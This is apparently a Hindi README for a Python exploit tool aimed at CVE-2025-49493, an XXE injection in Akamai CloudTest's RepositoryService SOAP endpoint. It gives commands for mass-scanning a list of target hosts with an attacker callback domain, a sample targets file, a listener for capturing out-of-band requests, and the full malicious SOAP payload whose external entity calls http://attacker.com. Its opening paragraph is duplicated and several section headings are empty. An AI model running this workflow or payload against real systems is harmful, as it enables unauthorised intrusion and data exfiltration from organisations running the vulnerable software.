
यह CVE-2025-49493 के लिए एक Python-आधारित एक्सप्लॉइट है, जो Akamai CloudTest के 60 2025.06.02 (12988) से पहले के संस्करणों को प्रभावित करता है। यह कमज़ोरी SOAP सेवा एंडपॉइंट के माध्यम से XML External Entity (XXE) इंजेक्शन की अनुमति देती है।
यह CVE-2025-49493 के लिए एक Python-आधारित एक्सप्लॉइट है, जो Akamai CloudTest के 60 2025.06.02 (12988) से पहले के संस्करणों को प्रभावित करता है। यह भेद्यता SOAP सेवा एंडपॉइंट के माध्यम से XML एक्सटर्नल एंटिटी (XXE) इंजेक्शन की अनुमति देती है।
यह भेद्यता /concerto/services/RepositoryService SOAP एंडपॉइंट में मौजूद है, जहाँ XML इनपुट को बाहरी एंटिटीज़ के उचित सैनिटाइज़ेशन के बिना संसाधित किया जाता है। एक हमलावर XXE हमलों को ट्रिगर करने के लिए दुर्भावनापूर्ण XML पेलोड तैयार कर सकता है, जिससे संभावित रूप से निम्नलिखित परिणाम हो सकते हैं:
आवश्यक पैकेज इंस्टॉल करें:
pip install -r requirements.txt
या मैन्युअली इंस्टॉल करें:
pip install requests urllib3 colored pyfiglet
python main.py targets.txt xxe.attacker.com
# With custom timeout
python main.py targets.txt collaborator.burp.com --timeout 20
# Using interactsh for OOB detection
python main.py targets.txt attacker.interactsh.com
positional arguments:
targets Target file containing list of Akamai CloudTest hosts
xxe_server XXE server to capture requests (e.g., attacker.com or IP)
optional arguments:
-h, --help show this help message and exit
--timeout TIMEOUT Request timeout in seconds (default: 10)
एक targets.txt फ़ाइल बनाएँ जिसमें प्रत्येक पंक्ति में एक टारगेट हो:
https://example-cloudtest.akamai.com
https://demo-cloudtest.example.com
https://test-cloudtest.internal.company.com
https://cloudtest.example.org
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latestinteractsh-clientअनुरोधों को कैप्चर करने के लिए एक सरल HTTP सर्वर सेट करें:
# simple_server.py
import http.server
import socketserver
class RequestHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
print(f"XXE Request received: {self.path}")
print(f"Headers: {self.headers}")
super().do_GET()
with socketserver.TCPServer(("", 8000), RequestHandler) as httpd:
print("Server running on port 8000")
httpd.serve_forever()
एक्सप्लॉइट निम्नलिखित XXE पेलोड संरचना का उपयोग करता है:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [
<!ENTITY xxe SYSTEM "http://attacker.com">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:rep="http://example.com/services/repository">
<soapenv:Header/>
<soapenv:Body>
<rep:getUIBundleObjectXml>
<rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
</rep:getUIBundleObjectXml>
</soapenv:Body>
</soapenv:Envelope>
तत्काल कार्रवाई:
दीर्घकालिक समाधान:
सुरक्षित XML प्रोसेसिंग:
# Disable external entities in XML parsers
import xml.etree.ElementTree as ET
parser = ET.XMLParser()
parser.parser.DefaultHandler = lambda data: None
parser.parser.ExternalEntityRefHandler = lambda *args: False
इनपुट सत्यापन:
यह टूल केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है। उपयोगकर्ता किसी भी सिस्टम का परीक्षण करने से पहले उचित प्राधिकरण सुनिश्चित करने के लिए जिम्मेदार हैं। इस टूल के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए लेखक जिम्मेदार नहीं हैं।
यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।